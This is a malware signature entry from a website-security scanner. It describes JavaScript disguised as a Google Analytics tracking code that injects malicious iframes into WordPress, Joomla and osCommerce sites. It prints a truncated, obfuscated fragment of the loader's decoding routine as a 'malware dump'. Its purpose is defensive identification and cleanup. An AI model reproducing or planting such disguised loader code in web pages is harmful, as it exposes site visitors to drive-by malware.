SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwjs537


Description: Malicious javascript desguised as a Google analytics tracking code, and used to load malware (iframes) from multiple domains (specially from

Affecting: Any web site (common on WordPress, Joomla and osCommerce).

Clean up: Our team can clean up it for you:

Malware dump:

<script snc="" id="googleanalytics"..

var emob = googleanalytics;var emsk = 126853 * 4;var emsp =,0);var k .. emob.innerHTML.split(emsk.toString())[1].split(emsp);for(var v in t) { if(v%2 == 0) {var c = parseInt(t[v++]+t[v],8+...